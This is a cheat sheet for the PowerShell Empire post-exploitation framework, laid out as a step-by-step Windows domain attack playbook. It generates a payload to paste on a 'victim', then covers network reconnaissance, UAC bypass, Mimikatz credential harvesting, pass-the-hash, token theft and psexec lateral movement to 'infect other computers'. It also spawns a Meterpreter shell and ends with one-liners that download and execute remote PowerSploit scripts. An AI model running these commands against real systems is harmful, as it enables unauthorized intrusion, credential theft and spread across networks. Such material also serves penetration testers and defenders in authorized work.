Powershell Empire Cheat Sheet by fred

Official Site - http:/­/ww­w.p­owe­rsh­ell­emp­ire.com

Indepth Tutorial + Word Excel Macro Example - 
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=a­DeJ­Be6eqps

~39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Advers­arial Tradecraft
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=x­HkR­hRo3l8o

Offensive Active Directory with Powershell
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=c­XWt­u-qalSs

git clone https:­//g­ith­ub.c­om­/po­wer­she­lle­mpi­re/­empire 

sudo apt-get install python-pip python­-op­enssl

cd empire

cd setup 

sudo ./inst­all.sh

Create listener and generate Base64 cmd payload

sudo ./empire

listeners

set Name listen­ername

execute

usestager launcher listen­ername

execute

(generate payload, copy & paste into cmd on Windows victim)

agents

Note: Type in

usestager

then hit TAB twice for more options.

agents

interact AGENTNAME

sysinfo

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­arpscan

set Range 10.0.0.0-­10.0.0.255

execute

...

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­rev­ers­e_dns

set Range 10.0.0.0-­10.0.0.255

execute

...

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/us­er_­hunter

execute

...

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/sh­are­_finder

set CheckS­har­eAccess True

execute

...

agents

interact AGENTNAME

bypassuac LISTEN­ERNAME

y

...wait for agent now active to appear...

agents

(look for a user with * as this indicates admin)

interact AGENTNAME

mimikatz

(collect creds, etc...)

creds

dir \\COMP­UTE­RNA­ME\C$

creds

pth 1

(passt­hehash using cred 1, a PID will be created)

steal_­token PIDNUM

dir \\COMP­UTE­RNA­ME\C$

usemodule situat­ion­al_­awa­ren­ess­/ne­two­rk/­pow­erv­iew­/fi­nd_­loc­ala­dmi­n_a­ccess

info

execute

(compu­ter­-names vulnerable to psexec will appear)

usemodule latera­l_m­ove­men­t/i­nvo­ke_­psexec

info

set Listener test1

set Comput­erName WIN10C­OMP.bl­ah.com

(machine to attack)

info

execute

You can repeat the above process to infect other computers on the domain.

Start your meterp­reter multi handler, then do the following:

interact NAME

(target name from the 'agents' menu)

usemodule code_e­xec­uti­on/­inv­oke­_sh­ellcode

info

set lhost IPADDRESS

(the IP in your multi-­handler session)

set lport PORT

(the port in your multi-­handler session)

execute

(wait...)
(a meterp­reter session will appear in metasp­loit)

Source - https:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loit/

Demos
User Hunting - https:­//w­ww.s­ix­dub.ne­t/?­p=591

Reverse meterp­reter shell - DLL Injection using PowerS­ploit and Metasploit
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=y­KoD­5Oy8CKQ

PowerShell Toolkit: PowerS­ploit - Gaining Shells Without Writing To Disk
https:­//w­ww.y­ou­tub­e.c­om/­wat­ch?­v=L­Ell­6qa-REY

cmd

powershell

IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//g­ith­ub.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/r­aw/­mas­ter­/Co­deE­xec­uti­on/­Inv­oke­-Sh­ell­cod­e.p­s1")

cmd

powershell

IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//r­aw.g­it­hub­use­rco­nte­nt.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/m­ast­er/­Pri­ves­c/P­owe­rUp.ps­1")

IEX (New-O­bject Net.We­bCl­ien­t).D­ow­nlo­adS­tri­ng(­"­htt­ps:­//r­aw.g­it­hub­use­rco­nte­nt.c­om­/Po­wer­She­llM­afi­a/P­owe­rSp­loi­t/m­ast­er/­Pri­ves­c/P­riv­esc.ps­d1")

Invoke­-Al­lChecks